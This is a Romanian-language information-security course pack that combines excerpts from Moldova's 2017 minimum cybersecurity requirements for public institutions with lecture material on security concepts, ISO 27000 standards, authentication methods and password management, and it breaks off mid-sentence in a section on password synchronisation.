Sunteți pe pagina 1din 723

Publicat : 07.04.2017 în Monitorul Oficial Nr.

109-
118 art Nr : 277
 Legea nr. 467-XV din 21 noiembrie 2003 cu
privire la informatizare şi la resursele
informaţionale de stat
 Legea nr. 71-XVI din 22 martie 2007 cu
privire la registre
 Programului naţional de securitate cibernetică
a Republicii Moldova pentru anii 2016-2020,
aprobat prin Hotărîrea Guvernului nr. 811 din
29 octombrie 2015
 Cancelaria de Stat, ministerele şi alte
autorităţi administrative centrale subordonate
Guvernului şi structurile organizaţionale din
sfera lor de competenţă, autoritățile
administrative autonome și unităţile cu
autonomie financiară, în termen de pînă la 31
decembre 2017, vor asigura implementarea
Cerințelor minime obligatorii de securitate
cibernetică
 nivelul 1 – de securitate cibernetică de bază
(utilizare TIC în activitatea instituției);

 nivelul 2 – de securitate cibernetică avansată


(utilizare TIC în activitatea instituției și
prestare servicii bazate pe TIC).
 autentificare multifactorială – autentificare cu cel puțin doi factori de
autentificare independenți;
 cerințe minime obligatorii de securitate cibernetică – sistemul de
management al securității cibernetice – toate politicile, procedurile,
planurile, procesele, practicile, rolurile, responsabilitățile, resursele și
structurile care sînt folosite pentru a proteja și păstra intactă informaţia;
 paravan de protecție (firewall) – un dispozitiv sau o serie de dispozitive
configurate în așa fel încît să filtreze, să cripteze sau să intermedieze
traficul dintre diferite domenii de securitate pe baza unor reguli
predefinite;
 actualizare – procedeu de modificare a unor fișiere și aplicații ale
calculatorului sau crearea unor noi;
 protecție malware – măsură tehnică de securitate, efectuată prin
folosirea de programe antivirus, în scopul protecției cibernetice;
 antispyware – măsură tehnică de securitate, efectuată prin folosire de
programe, în scop de prevenire a intruziunii cibernetice;
 test de penetrare – evaluare a securității cibernetice a unui sistem
împotriva diferitor tipuri de atacuri.
 Conducătorul autorității poartă răspundere
pentru asigurarea securității cibernetice în
instituție.
 Conducătorul autorității desemnează, prin act
administrativ, persoana (subdiviziunea)
responsabilă de punerea în aplicare a
sistemului de management al securității
cibernetice în instituție și prezintă M TIC
informația respectivă în termen de cinci zile
lucrătoare de la desemnarea acesteia.
 organizează SMSC în instituție;

 participă, cel puțin o dată pe an, la cursurile de formare


organizate de M TIC privind securitatea cibernetică și, respectiv,
organizează cursuri pentru angajații instituției;

 asigură elaborarea, implementarea și respectarea prevederilor


următoarelor documente (revizuit cel puțin o dată pe an):
- planul de acțiuni pentru asigurarea SC al instituției,
- politica de securitate cibernetică a instituției,
- planul de instruire și responsabilizare în SC a personalului,
- regulamentele interne de securitate cibernetică,
- procedurile de recuperare.
 scopul și obiectivele;
 principiile de organizare internă a
managementului de securitate cibernetică;
 analiza situației și vulnerabilităților
(disponibilitate, integritate și confidențialitate
a datelor, precum și analiza riscurilor și căilor
de remediere);
 declaraţia managementului instituției de
susţinere a scopului şi principiilor securităţii
cibernetice în instituție.
 instruirea privind etica cibernetică (programe/cursuri
de formare în domeniul securității cibernetice);
 măsurile de securitate internă privind activitatea
personalului (autorizație de acces, stabilirea
drepturilor, obligațiilor, restricțiilor, responsabilizarea
angajaților, monitorizarea, proceduri de asistență ale
utilizatorilor în cazuri de urgență);
 măsurile de securitate privind activitatea
personalului/companiilor externe cooptate
(coordonarea responsabilităților, acorduri de
nedivulgare, autorizație de acces, monitorizare,
planul de contingență (intervenție) pentru
suspendarea operațiunilor de externalizare).
 dezvoltarea, actualizarea, modificarea, mentenanța
sistemelor informaționale;
 gestionarea activelor și facilităților de comunicații
electronice și tehnologia informației;
 stocarea copiilor de rezervă ale datelor, precum şi ale
procedurilor de control;
 păstrarea datelor de acces, de jurnalizare a
activităților;
 monitorizarea securităţii sistemului;
 regulile de gestionare a evenimentelor de securitate;
 procedurile de utilizare a datelor în cazuri
excepționale (de urgență) ;
 procedurile de evaluare a securității cibernetice.
 stabilirea procedurilor privind copierea de
rezervă și de recuperare în cazul unui
incident de securitate cibernetică;
 descrierea acțiunilor măsurabile de
recuperare;
 atribuirea responsabilităților pentru
restabilirea funcționalităților;
 stabilirea procedurilor de notificare.
III. CERINȚELE MINIME OBLIGATORII
DE SECURITATE CIBERNETICĂ DE NIVELUL 1
(UTILIZAREA TIC ÎN ACTIVITATEA INSTITUȚIEI)
1) drepturile, obligațiile, restricțiile și responsabilitățile utilizatorilor urmează a fi stabilite de către persoana responsabilă de proces și
comunicat într-o formă stabilită responsabilului/subdiviziunii de securitate cibernetică;

2) persoana care desfășoară activități de administrare a sistemului utilizează conturi diferite pentru funcții de administrare și funcții de
utilizator;

3) fiecare cont de utilizator este asociat cu o persoană anumită. În cazul în care sistemul prevede neadmiterea utilizării acestor conturi
de către alte persoane, atunci sistemul trebuie să includă mijloace tehnice speciale, care să nu admită utilizarea acestor conturi de către
persoane terțe;

4) în cazul în care sistemul nu este utilizat pentru autentificarea multifactorială, adică nu este un atribut de o natură statică (de
exemplu, simbolic, un mesaj de cod-text de unică folosință), dar este un atribut de altă natură, utilizatorii sistemului trebuie să utilizeze
o parolă;

5) utilizatorul sistemului trebuie să folosească în calitate de parolă о combinaţie din numere (0-9), caractere latine (minuscule şi
majuscule) şi simboluri speciale (!#%), constituită din numărul minim de caractere, stabilit prin regulamentul intern de securitate, dar nu
mai puțin de 7 caractere;

6) se interzice stocarea electronică și transportarea în formă necriptată a parolelor utilizatorilor sistemului, inclusiv a procesului de
autentificare a utilizatorilor. Se admite transportarea acestora prin rețea publică necriptată doar în cazul utilizării unei parole de o singură
folosință, cu o valabilitate de 48 de ore de la momentul transmiterii acestora;

7) sistemul trebuie să dispună de mecanisme de gestiune a parolelor, precum şi să asigure autentificarea şi identificarea utilizatorului
pentru o perioadă limitată de timp;

8) nu se admite utilizarea în echipamentele și produsele program a parolelor implicite (de la producător);

9) datele despre activitățile în sistem (jurnalizarea) se stochează în timp real şi se păstrează pe perioada stabilită prin regulamentul
intern de securitate, dar nu mai puțin de 6 luni;

10) orice activitate în sistem trebuie să poată fi identificată într-un anumit cont de utilizator sau adresă IP;

11) managementul drepturilor de utilizator trebuie să asigure ca fiecare utilizator să poată face uz doar de drepturile sale. Verificarea
activităților în sistem se realizează periodic, la etape de timp stabilite conform regulamentului intern de securitate, dar nu mai rar de o
dată la 6 luni;

12) managementul controlului accesului trebuie să fie setat ca să permită acces autorizat din rețea externă prin Internet doar cu o
parolă de o singură folosință, inclusiv prin semnătura electronică din cadrul serviciului electronic guvernamental de autentificare şi
control al accesului (MPass).
 delimitarea clară a perimetrului rezervat diferitor
grupuri de echipamente IT, alcătuirea planurilor
camerelor de servere și a rețelelor;
 asigurarea condițiilor de încălzire, ventilare și aer
condiționat a încăperilor specializate;
 asigurarea accesului în spațiile specializate strict
conform competențelor;
 asigurarea securității energetice prin utilizarea unor
dispozitive conforme normativelor în vigoare și cu
protecție la suprasarcină;
 asigurarea mentenanței adecvate, conform cerințelor
tehnice;
 evidența echipamentelor și produselor program,
utilizare în cadrul instituției.
1) echipamentele și produsele program trebuie să fie
protejate ca să asigure operaționalitatea sistemelor;
2) pe calculatoarele conectate la reţeaua Internet trebuie să fie
instalat cel puțin (SO cu actualizările curente aplicate; program
antivirus activat și actualizat; firewall activat; blocare automată a
sistemului în caz de neutilizare a acestuia - screen saver, log-
off);
3) controlul tehnic se efectuează periodic, conform
regulamentului intern de securitate, și vizează:
4) aplicarea cerințelor de securitatea cibernetică la utilizarea
rețelelor:
5) elaborarea planului de continuitate, care va asigura
restaurarea caracteristicilor sistemului și a datelor în caz de
incident de securitate, care să includă:
6) stabilirea mecanismului de scoaterea din uz a
echipamentelor, distrugerea datelor ce le conțin și reutilizarea
lor;
7) stabilirea cerințelor de securitate și restricții pentru
echipamentele personale utilizate în cadrul instituției.
 aplicarea ghidului de utilizare a serviciilor sistemului de poștă electronică, aprobat ca document tehnic pentru
toate autoritățile sus-menționate, și obligarea personalului privind:
a) verificarea chenarului cu adrese înainte de expediere a corespondenței și a destinatarului, pentru a evita
erorile;
b) precauția față de conținutul mesajelor recepționate, verificarea datelor expeditorului/companiei, în mod
special a celor de la expeditori necunoscuți, privind eventuala falsificare a identității pentru a ascunde adevărata
sa origine;
c) verificarea și scanarea antivirus a anexelor la mesaje recepționate și a extensiilor acestora;
 interzicerea:
a) redirecționării automate a mesajelor din poșta de serviciu spre alte conturi personale/private;
b) utilizării poștei electronice de serviciu pentru a expedia sau redirecționa mesaje considerate obscene,
amenințătoare, ofensatoare, calomnioase, defăimătoare, rasiste, pornografice, de hărțuire, de ură, remarci
discriminatorii și alte mesaje antisociale;
c) transmiterii/retransmiterii în lanț a mesajelor cu divers conținut irelevant pentru activitatea de serviciu;
d) utilizării poștei electronice de serviciu pentru obţinerea unui cîștig material, în scopuri personale, politice
sau de alt gen;
e) distribuirii materialelor protejate de drepturi de autor;
f) transmiterea informațiilor confidențiale prin mesaje electronice nesecurizate;
g) utilizarea poștei electronice de serviciu pentru răspîndirea virușilor de calculator, de infiltrare în sisteme,
deteriorare sau distrugere a datelor, produselor program și echipamentelor ori care duc la degradarea sau
perturbarea performanței rețelei;
h) ascunderea și încercarea de a ascunde identitatea atunci cînd este trimis un mesaj prin poșta electronică de
serviciu;
 limitarea accesului personalului la conținut obscen și antisocial, a descărcării conținutului protejat de drepturi de
autor, utilizarea neconformă a informațiilor de serviciu și distribuirea lor, descărcarea materialelor din surse
necunoscute, precum și alte activități ce contravin obiectivelor instituției.
V. CERINȚELE MINIME OBLIGATORII
DE ASIGURARE A SECURITĂȚII CIBERNETICE
LA ACHIZIȚIA SISTEMELOR INFORMAȚIONALE
NOI SAU ACTUALIZAREA CELOR EXISTENTE
1) suportul anumitor sisteme de securitate și de mentenanță (inclusiv înlăturarea lacunelor
de securitate ale sistemului, într-o perioadă prestabilită);

2) transmiterea către instituție a dreptului de autor asupra codului-sursă a produselor


program;

3) stabilirea perioadei de timp în care se efectuează actualizările propriu- zise;

4) sistemul de securitate cibernetică poate prevedea caracteristici mai stricte decît cele
prevăzute în prezentele Cerințe, dar în măsura în care nu intră în conflict cu legislația în
vigoare;

5) înainte de achiziționarea unui nou sistem sau dezvoltarea celui existent, instituția
elaborează și aprobă politica de securitate și se asigură că sistemele noi, pe parcursul
dezvoltării lor, vor fi conforme prezentelor Cerințe;

6) înainte de a pune în funcțiune un nou sistem, instituția trebuie să se asigure de


funcționalitatea caracteristicilor de securitate ale acestuia conform cerințelor prestabilite, prin
efectuarea de o terţă parte a testelelor respective;

7) instituţia asigură efectuarea periodică a auditului de securitate a sistemului, în


conformitate cu documentaţia tehnică aprobată;

8) dezvoltarea și testarea sistemului nu trebuie să fie sau să prezinte un pericol pentru


integritatea datelor stocate în sistem.
VI. CERINȚE DE SECURITATE LA
EXTERNALIZAREA
ADMINISTRĂRII/MENTENANŢEI SISTEMELOR
1) reglementările interne de securitate cibernetică ale instituției pe care trebuie
să le urmeze prestatorul de servicii în realizarea prevederilor contractuale;

2) serviciile externalizate;

3) cerințele precise pentru volumul și calitatea serviciilor externalizate


documentate ca Service Level Agreement (SLA);

4) drepturile și obligațiile instituției și prestatorului de servicii externalizate:

a) dreptul instituției de a monitoriza continuu calitatea serviciilor furnizate;


b) dreptul instituției de a înainta prestatorului extern de servicii un titlu
executoriu cu privire la aspectele legate de externalizarea de bună-credință, de
înaltă calitate, executarea la timp și corectă a legilor și a regulamentelor;
c) dreptul instituției de a înainta prestatorului extern de servicii o cerere scrisă
motivată pentru încetarea imediată a contractului de externalizare, în cazul în care
instituția a constatat că prestatorul extern de servicii nu respectă cerințele
contractului de externalizare privind valoarea sau calitatea serviciului;
d) obligația prestatorului extern de servicii de a furniza instituției informația
privind monitorizarea continuă a calității serviciilor de externalizare prestate;
e) dreptul de audit al prestatorului de serviciu, dacă au fost notificate
nonconformități critice.
VII. RĂSPUNSUL LA INCIDENTE,
CONTINUITATEA
PROCESELOR ȘI RECUPERAREA
24. Planul de răspuns la incidente stabilește că:
1) instituția trebuie să elaboreze și să pună în aplicare planul de
răspuns de incidente cibernetice;
2) în cazul unor încălcări ale securității cibernetice, persoana
responsabilă/subdiviziunea asigură imediata notificare, înregistrare și
verificare a incidentelor de securitate cibernetică și punerea în aplicare a
măsurilor de contracarare a acestora, conform procedurilor stabilite.

25. Continuitatea activității și procedurile de recuperare în caz de


dezastru trebuie să prevadă:
1) implementarea procedurilor de efectuare a copiilor de rezervă și a
celor de recuperare;
2) elaborarea și implementarea obiectivelor de recuperare, conform
obiectivelor momentului de recuperare (OMR) și perioadei de recuperare
(OPR).

26. Conformitatea cu cerințele interne și externe de securitate


cibernetică stipulează că:
1) instituția actualizează planul său de acțiuni pentru asigurarea
securității cibernetice, care precizează măsurile puse în aplicare și cele
planificate;
2) instituția asigură conformitatea sa cu cerințele externe de
securitate cibernetică, prevăzute de legislație.
Tema nr.1 Concepte generale privind
Securitatea Informației

1.Concepte generale privind SI.


2. Scurtă istorie a securității informaționale.
3. Nivelele de structurare a conceptului de SI

Lector univ. R.Bulai


Concepte generale privind SI
• Informatia reprezinta cea mai mare valoare in
orice organizatie, alaturi de resursele
financiare si cele umane

• Indiferent de forma pe care o îmbracă,


mijloacele prin care este memorată, transmisă
sau distribuită, informația trebuie protejată.
Concepte generale privind SI
Securitatea informației este procesul de
protejare a datelor prelucrate, stocate și
transmise contra accesării, modificări și/sau
distrugerii, de asemenea, protejarea
resurselor informaționale contra încercărilor
de limitare a procesului de funcționare a
acestora.
Concepte generale privind SI
SI are ca scop oferirea celor mai importante
tehnologii, solutii si servicii profesionale aferente
ariilor de securitate, networking, infrastructura de
acces, storage si virtualizare, precum si suport activ
pentru generarea acestora.

SI poate fi definită ca un sistem global menit să


asigure un nivel adecvat de protecţie a informaţiilor şi
a activelor aferente, în scopul de a garanta
Disponibilitatea, Integritatea si Confidenţialitatea.
Principii
• DISPONIBILITATEA proprietatea accesării şi utilizarii
informatiiei doar de către o entitate autorizată
• INTEGRITATEA proprietatea de a proteja
corectitudinea şi caracterul complet al informaţiilor
• CONFIDENTIALITATEA proprietatea prin care
informaţiile nu sunt divulgate sau puse la dispoziţia
unor persoane neautorizate, entităţi sau procese
Scurtă istorie a securității
informaționale
Se pot puncta citeva generatii, pe planul evolutiei
TI cu impact asupra Sistemelor de securitate:
• G.I – sec. sist. bazate pe calculatoare mari
• G.II – sec. sist. didtribuite
• G.III – sec. microcalc., inclusiv a retelelor locale
• G.IV – sec. Internetului
• G.V – sec. comertului si afacerilor electronice
• G.VI – sec. afacerilor mobile
• G.VII – sec. globala a lumii virtuale, a intregului
spatiu Cibernetic
Scurtă istorie a securității
informaționale
• La nivel international, in 1960 a fost constituita Federatia
Intern. pentru Prelucrarea Informatiilor (IFIP) sub auspiciile
Unesco care reuneste peste 58 de tari si depaseste 35000
de membri specialisti.
• Activitatea federatiei este coordonata de 13 comisii
tehnice, fiecare cu un numar diferit de grupuri de lucru
(101 gr.).
• Comisia TC11 (1984) – Protectia si securitatea in sistemele
de prelucrare a informatiilor, avind 11 grupuri de lucru: ex.
WG11.1(1992) – Managementul SI, WG11.2 (1985) –
Securitatea sist. mici, WG11.3(1987) – Sec. datelor si
aplicatiilor, WG11.4 – Sec.retelelor etc., WG11.9(2004) –
Criminalistica in mediul digital…
Scurtă istorie a securității
informaționale
• In 1974 s-a infiintat Institutul pentru Sec.
Calculatoarelor (CSI – www.gocsi.com) pentru
formarea specialistilor in sec. informatiilor,
calculatoarelor si retelelor.
• In 1990 Comitetul pentru Informatii, Calculatoare
si Politici de Comunicatie ale OECD (Organizatia
pentru Cooperare si Dezvoltare Economica) a
constituit un grup de experti care au realizat si
semnat in 1992 Ghidul pentru securitatea
sistemelor informationale.
Istorie
• La începutul anilor ’90 BSI (British Standard Institution) a
dezvoltat o serie de standarde ca răspuns la cererile
industriei, guvernului și mediului de afaceri de a crea o
structură comună pentru SI.
• În 1995 autoritatea de reglementare din Marea Britanie
a adoptat în mod oficial BS7799.
• În 2000 ISO a preluat primele 4 părți ale BS și le-a
publicat sub numele “ISO 17799 – Code of Practice”.
• În 2002 a fost revizuită partea a doua a standardului
BS7799 pentru a reflecta și prevederile ISO 9001, ISO
14001.
• În 2005 este publicat sub denumirea ISO 27001,
totodată, ISO 17799 devine ISO 27002.
Standardele internaţionale de securitate
Familia ISO/IEC 2700k

• ISO/IEC 27001:2005 “Sistemul de Management al Securităţii


Informaţiei”
• ISO/IEC 27002:2005/ Cor 1:2007 (sau ISO 17799:2005) “Codul
de practică pentru Managementul Securităţii Informaţiei”
• ISO 27003: “Direcţiile implementării SMSI”
• ISO 27004: “Măsuri”
• ISO 27005: “Gestiunea riscurilor în securitatea informaţională”
• ISO 27006: “Cerinţe pentru organizaţiile care efectuează auditul
şi certificarea SMSI”
• ISO 27007: “Linii directoare pentru auditul SMSI”
ENISA (European Network and Information Security Agency) - Agentia
Europeana pentru Securitatea Retelelor si a Informatiei

• Formal, ENISA a luat fiinta in urma adoptarii Regulamentului comun (EC)


No.460/2004 al Parlamentului European si al Consiliului Uniunii Europene din data
de 10 martie 2004.

• A fost conceputa pentru a intensifica posibilitatile Uniunii Europene, a Statelor


Membre ale Uniunii Europene si ale comunitatii de afaceri de a preveni, de a
gestiona si de a rezolva problemele de securitate a retelelor si a informatiei,
conform Rezolutiei Consiliului: “eAction Plan: Information and Network Security”,
adoptata in data de 31 mai 2001 la Waxholm.

• Aceasta noua agentie a Uniunii Europene a devenit operationala in luna


septembrie 2005, dupa redislocarea efectuata din Bruxeles in Creta, cat si dupa
intrarea in functiune a Staff-ului care a fost recrutat prin concurs tip EU25 dintre
candidati provenind din intreaga Europa, constituind o structura creata cu
misiunea si scopul de a supraveghea un domeniu foarte specific si important,
deopotriva tehnic, stiintific si managerial,Curtea Europeana de Justitie consfintind
legalitatea crearii ENISA in data de 2 mai 2006.
Nivelele de structurare a conceptului de SI
Securitatea fizică
Nivelele de structurare a conceptului de SI
Securitatea logică
Nivelele de structurare a conceptului de SI
Securitatea juridică
Tema: Controlul accesului în sistemele informatice

1. Metode de autentificare

Controalele sunt impuse pentru a diminua riscurile la care sunt expuse sisteme
informaționale și pentru reducerea potențialelor pierderi. Controalele vizează responsabilizarea
persoanelor care accesează informații sensibile.
Responsabilizarea este înfăptuită prin mecanisme de control al accesului care exercită
funcțiile de identificare, autentificare, autorizare și auditare.
Autentificarea este procesul de stabilire că un obiect sau un subiect sunt adevarate, asa cum
cineva pretinde - procesul de verificare a identitatii digitale.
Autorizarea este procesul prin care unei entități particulare i se acordă dreptul să presteze o
activitate, pe baza unor reguli, ca urmare a unei proprietăți moștenite din procesul de autentificare.
Pot fi determinate de o gama de restrictii: restricții de timp, restricții de locație fizică,
restricții de acces multiplu la resursă etc..
Auditarea reprezintă urmărirea evenimentelor, precum eșecuri de autentificare și
autorizare, resurse consumate de către utilizatori.
În afara aspectelor de securitate aceste informații pot fi utilizate pentru management,
planificare, facturare etc.
Informațiile tipice strânse conțin identitatea utilizatorului, natura serviciului furnizat,
momentul la care serviciul a inceput și când s-a terminat etc.

Metode de autentificare bazate pe un singur factor:


- Autentificare bazată pe ceea ce știi. Controlul accesului prin parole - autentificarea cu
username și parolă.
- Autentificare bazată pe ceea ce ai. Controlul accesului prin obiecte – cartele
magnetice, carduri auexpirante, echipamente de identificare personală sau jetoane, PKI
și cheia privată.
- Autentificare bazată pe ceea ce ești. Controlul accesului prin biometrie – identificările
biometrice (amprente digitale, semnătură, voce, forma mîinii, imaginea retinei,
imaginea feței etc.
- Autentificare bazată pe locul unde ești. Controlul geografic al accesului - autentificarea
cu semnatura locației, unde este înregistrat calculatorul, figura 1.
Figura 1. Metode de autentificare în Windows 10

Metode de autentificare bazate pe mai mulți factori (autentificarea multifactorială) sunt


metodele de control al accesului care se bazează pe cel puțin două dintre cele 4 căi enumerate
(cartelă-parolă, jeton-parolă etc.
Autentificare centralizată: utilizarea unui model centralizat ca autoritate centrală care
autentifică utilizatorii remote (la distanță) la un mare număr de sisteme. Utilizează protocoale de
autentificare remote ca RADIUS (Remote Access Dial-In User Service), TACACS (Terminal
Access Controller Access-Control System), Kerberos, DIAMETER.
Tehnologia one time password (OTP): parola utilizată o singură data, validă doar pentru o
singură sesiune de autentificare. Poate fi limitată de un interval de timp și se cere utilizarea
tehnologiilor suplimentare (cel mai des telefoanele mobile).
Exemple de OTP: RSA SecurID, utilizatorul poarta un token care este sincronizat în timp
cu serverul central RSA.

RISCURI ȘI RECOMANDĂRI
Să fie utilizată autentificarea multifactorială, adică pe lîngă faptul că se utilizează o parolă,
să fie utilizat, de exemplu, un mesaj de cod-text de unică folosință, un token de securitat etc.
Să se utilizeze mecanismele de gestiune a parolelor, care asigură autentificarea şi
identificarea utilizatorului pentru o perioadă limitată de timp.
2. Managementul parolelor

Parola reprezintă cea mai utilizată metodă de autentificare în sistemele informatice sau servicii
web. Din punct de vedere a utilizatorului, memorarea unei parole unice este mai uşor, decît gestionarea
mai multora. Pentru atacatori, utilizarea unei singure parole înseamnă că toate sistemele vor fi în mod
automat compromise, dacă parola dintr-un sistem slab protejat va fi spartă cu succes.
Parola asigură prima linie de apărare împotriva accesului neautorizat de aceia este esenţial
să se mențină eficacitatea acestei linii de apărare implimentîndu-se în mod riguros o bună politică
de gestionare şi administrare a parolei.
Pentru un management mai eficient şi menţinerea securităţii parolelor se recomandă
respectarea urmatoarelor politici :
- Parola nu trebuie să coincidă cu codul numeric personal, cu data naşterii, cu numărul
de telefon, cu nume, prenume, numele de utilizator (login-ul), cu numele membrilor de
familiei, cu funcţia, departamentul etc., cu nume de străzi, nume proprii, cu mărci sau modele de
maşini etc., cu numele sau sloganul unor organizaţii, să fie termeni tehnici sau cuvinte din
dicţionar.
- Parolele nu trebuie comunicate nimănui sub niciun motiv, chiar şi cu scopul reparării
calculatorului, în aşa cazuri se creează un cont nou cu un nivel de acces corespunzător.
- Parolele comune trebuie schimbate imediat ce o persoană părăsește grupul sau nu mai
are dreptul utilizării.
- Parolele trebuie schimbate imediat ce se constată unele bănuieli privind cunoașterea lor
de alte persoane sau compromiterea lor.
- Parolele trebuie ținute minte și nu scrise oriunde (cu excepția necesității intervenției de
urgență/plic sigilat).
- Dacă este dificil să se rețină mai multe parole, un manager de parole de încredere poate
fi o soluție bună.
- La introducerea parolei nu trebuie să se afle persoane străine prin preajmă.
- Blocarea operațiunilor de încercare repetată de logare.
- Niciodată să nu fie introdusă parola după ce a fost urmat un link dintr-un e-mail primit
de la un site care nu prezintă încredere.
- Dacă un terminal funcționează o perioadă lungă de timp, procesul de autentificare
trebuie să aibă loc la intervale regulate de timp pentru a se asigura că nu folosește altcineva
sistemul.
- La deschiderea unei noi sesiuni de lucru, utilizatorului trebuie să i se aducă la cunoștință
ultimul timp de accesare a sistemului cu parola respectivă.
- Evitarea reutilizării parolei anterioare. Dacă un cont de utilizator a fost compromis
anterior, fie conștient sau inconștient, reutilizarea parolei ar putea permite compromiterea repetată.
Deasemenea, în cazul în care o parolă a fost împărtășită pentru un motiv oarecare, reutilizarea ei
ar putea permite cuiva acces neautorizat la conturi.
- Evitarea utilizării aceleași parole pentru mai multe conturi.
- Să nu fie utilizată funcţonalitatea de logare automată. Aceasta diminuează valoarea
parolei, dacă un răufăcător va avea acces la un sistem astfel configurat, el va fi în măsură să preia
controlul asupra întregului sistem și a avea acces la informații potențial sensibile.
- Notificarea despre schimbarea parolei.
- Actualizarea adresei de e-mail de recuperare în mod regulat, pentru a putea primi e-
mailuri în cazul în care este nevoie de resetat parola. De asemenea, se poate adăuga un număr de
telefon pentru a primi codurile de resetare a parolei prin mesaj text. În plus, multe site-uri oferă
posibilitatea de a răspunde la o întrebare de securitate în cazul în care parola este uitată. Dacă
întrebarea este creată de sinestătător, răspunsul la ea ar trebui să fie cunoscut doar de utilizator.
Răspunsul nu ar trebui să poată fi ghicit din informațiile pe care sunt postate online pe bloguri sau
pe profilurile din rețelele sociale. Dacă întrebarea este aleasă dintr-o listă de opțiuni, cum ar fi
orașul în care v-ați născut, răspunsul trebuie personalizat astfel încît, chiar dacă cineva ghicește
răspunsul, nu va ști cum să-l introducă în mod corect.
- Sistemele de calcul nu trebuie lăsate nesupravegheate fără a activa un sistem de blocare
a accesului la acestea; deblocarea trebuie să se facă folosind parola.

RESTRICȚII
Este interzisă stocarea electronică și transportarea în formă necriptată a parolelor
utilizatorilor sistemului, inclusiv a procesului de autentificare a utilizatorilor.
Nu se admite utilizarea în echipamentele și produsele program a parolelor implicite (de
la producător).

O parolă puternică reduce riscul ghicirii sau aflării sale prin atacul brute-force. Puterea
unei parole este determinată de lungimea, complexitatea şi impredictibilitatea apariţiei caracterelor
în componenţa sa.
Pentru crearea unei parole puternice este recomandat ca ea să conţină:
- cel puţin 14 caractere lungime şi nu 8 – ele sunt destul de vulnerabile;
- caractere alfabetice mari și mici (A-Z, a-z);
- cel puțin un caracter numeric (0-9);
- cel puțin un caracter special (~! @ # $% ^ & * () _- + =);
- să poată fi tastată rapid (reduce observarea „peste umăr”).

Modalităţii de creare a parolelor


Există două moduri de creare a parolelor: prin generare aleatoare (sau pseudoaleatoare) şi
prin construirea ei de către utilizator.
Generarea aleatoare a parolelor este o metodă recomandată spre utilizare, aplicaţiile de
acest tip implimentează recomandările generale pentru crearea unei parole puternice astfel creînd
parole indistructibile, dar greu de memorat.
Utilizatorul alege o parola folosindu-se de propria imaginaţie, dar în cele mai multe cazuri
acesta utilizează cuvinte întregi din dicţionar sau părţi din acestea, serii de caractere de pe tastatura,
adrese, numere de telefon, ani de naştere etc. Deşi sunt ușor de memorat, parolele rezultate sunt şi
usor de ghicit, alegerea unor astfel de parole fiind o greşeala mare şi frecventă a utilizatorilor.
Pentru crearea parolelor puternice şi uşor de memorat s-au dezvoltat mai multe metode:
Metoda mnemonicii – se selectează o fraza şi se extrage cîte un caracter din fiecare cuvînt
(de exemplu prima sau a doua literă din fiecare cuvînt), apoi se adaugă numere şi simboluri. De
exemplu, din fraza Eu am cea mai puternică parolă vreodată creată de cineva!, obținem
următoarea parolă: Eacmppvcdc!
Deşi o parolă creată mnemonic este mai puternică decît una creată utilizînd un dicţionar,
ele sunt sensibile la atacul brute-force. Frazele uzuale transformate în parole mnemonice, fără
folosirea substituții de caractere neobișnuite sau alte modificări, pot fi ghicite de atacatorii
utilizăndu-se dicţionarul parolelor mnemonice. Utilizatorii care creează astfel de parole ar trebui
să creeze propriile fraze, sau să facă schimbări neaşteptate, cum ar fi utilizarea caracterilor mari, a
semnelor de punctuație, scrierea completă a unor cuvinte.
Modificarea frazelor – se selectează o fraza şi îi se modifică forma într-o derivată de-a sa.
Această metodă permite crearea parolelor lungi, complexe şi uşor de memorat. De exemplu, din
fraza to be or not to be obținem următoarea parolă: 2.be.0r.nOt@to0.bEE.
Combinarea şi modificarea cuvintelor - se combină doua sau trei cuvinte fără legătură între
ele şi se schimbă unele litere cu numere sau caractere speciale. De exemplu, din cuvintele “mail”
and “phone” obținem următoarea parolă: m4!l&f0N3.
Metoda tiparului - aceasta metodă folosește un tipar (pattern) de pe tastatură. Cu ajutorul
tiparului se poate obţine foarte uşor următoarea parolă: 6VsDrOms;yr, care de fapt reprezintă
5CaseInalte. Pentru crearea parolei se selectează de pe tastatura cifra din dreapta la 5, litera din
dreapta la “C”, litera din dreapta la “a” etc. prin urmare tiparul este selectarea tastei din dreapta
pentru fiecare element (figura 2).

Figura 2. Metoda tiparului– din 5CaseInalte obținem parola: 6VsDrOms;yr

Un alt model de tipar transformă o parola simplă, cu un grad foarte mic de securitate Avion!,
într-o parolă cu un grad de securitate foarte ridicat QWfg8990hj!” (figura 3).

Figura 3. Metoda tiparului– din Avion! obținem parola: QWfg8990hj!


2.1.Tehnici de autentificare prin parole

Au fost dezvoltate mai multe soluţii de gestionare şi administrare mai eficientă a parolelor
pentru a reduce numărul de conturi şi parole pe care utilizatorii trebuie să le memoreze. Cum ar fi
soluţii de management centralizat Single Sign One (SSO), Sincronizarea Parolei şi soluţie de
management local - manager de parole. Aceste soluţii reduc probabilitatea compromiterii
parolelor deoarece ele nu sunt scrise sau tapate şi dispare necesitatea creării unor parole slabe.
Single Sign One este o tehnologie care permite utilizatorului printr-o singură autentificare
să aibă acces la toate resursele la care este autorizat să le utilizeze. Autentificarea la resursele
individuale este suportată de către tehnologia SSO într-un mod transparent utilizatorului. Exemple
de soluții SSO: Windows Live ID, OpenID.
OpenID este un sistem standard de autentificare a utilizatorilor în cadrul site-urilor. Adică
un singur utilizator și o singură parolă poate să se logheze pe toate site-urile fară a mai crea conturi
noi sau a confirma email-uri.
Pentru a deține un astfel de cont utilizatorul trebuie sa se inregistreze la un provider OpenId
(Google, Facebook, Twitter, Yahoo, Wordpress, LiveJournal, Myspace).
Aceste site-uri nu sunt singurele care oferă un OpenId. Este foarte important ca providerul
OpenId-ului să fie unul cît mai sigur şi mai ușor în utilizare.
De obicei site-urile care suportă OpenID pe pagina de autentificare ,pe lîngă cîmpurile
standarte login și parolă, au cîmpul OpenID. Pentru a se autentifica utilizatorul trebuie să intoducă în
acest cîmp autentificatorul pe care îl primește de la provider-ul Open-ID. Pe lîngă protocolul de
autentificare dat se poate folosi și un protocol de autentificare extins. În acest caz utilizatorul creează
pe serverul companiei provider un cont cu care se poate loga pe oricare site care suportă OpenID.
Sincronizarea parolei este o soluţie de management care constă în schimbarea parolei la
alte resurse cu parola dată de utilizator, astfel el are posibilitatea să se autentifice utilizînd o singură
parolă pentru mai multe resurse. Beneficiul principal al acestei soluţii este reducerea numărule de
parole pe care utilizatorii au nevoie să și-l amintească. Acest lucru permite utilizatorilor să
selecteze parole puternice și să le memoreze mai ușor. Spre deosebire de tehnologia SSO,
sincronizarea parolei nu reduce numărul de ori pe care utilizatorii trebuie să se autentifice. Soluția
de sincronizare a parolei este de obicei mai ușoară și mai puțin costisitor de implementat decât
